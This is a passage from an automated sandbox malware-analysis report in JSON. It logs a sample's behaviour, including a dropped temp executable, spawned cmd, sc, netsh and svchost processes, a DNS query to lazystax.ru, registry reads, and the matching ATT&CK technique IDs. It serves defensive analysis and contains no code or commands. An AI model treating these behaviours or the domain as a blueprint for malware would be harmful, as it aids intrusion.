with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00005848) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00005848) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"qhdkbaei.exe\" (UID: 00000000-00003436) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"qhdkbaei.exe\" (UID: 00000000-00003436) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00002232) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", USERDNSDOMAIN=\"%OSUSER%-PC\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00002232) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"svchost.exe\" (UID: 00000000-00002564) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00002564) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"qhdkbaei.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"qhdkbaei.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"qhdkbaei.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67EE4FD0.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67EE4FD0.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67EE4FD0.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67EE4FD0.bin\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" has an executable section named \".text\"\n \"qhdkbaei.exe\" has an executable section named \".text\"\n \"DISMHOST.EXE.67EE4FD0.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" has an writable section named \".data\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" has an writable section named \".text\"\n \"qhdkbaei.exe\" has an writable section named \".data\"\n \"qhdkbaei.exe\" has an writable section named \".text\"\n \"DISMHOST.EXE.67EE4FD0.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xb18000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xd70000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"qhdkbaei.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67EE4FD0.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035\" was detected as \"VC8 -> Microsoft Corporation\"\n \"qhdkbaei.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"DISMHOST.EXE.67EE4FD0.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"qhdkbaei.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\qhdkbaei.exe]- [targetUID: 00000000-00005876]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"qhdkbaei.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" reads file \"c:\\25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe.Local\\\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\25C97105D482ED561E53B782CFEB071336E9FFC9E9966A962BD9EF492E69E035.EXE.LOCAL\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\qhdkbaei.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" (Access type: \"QUERYVAL\"; Path: 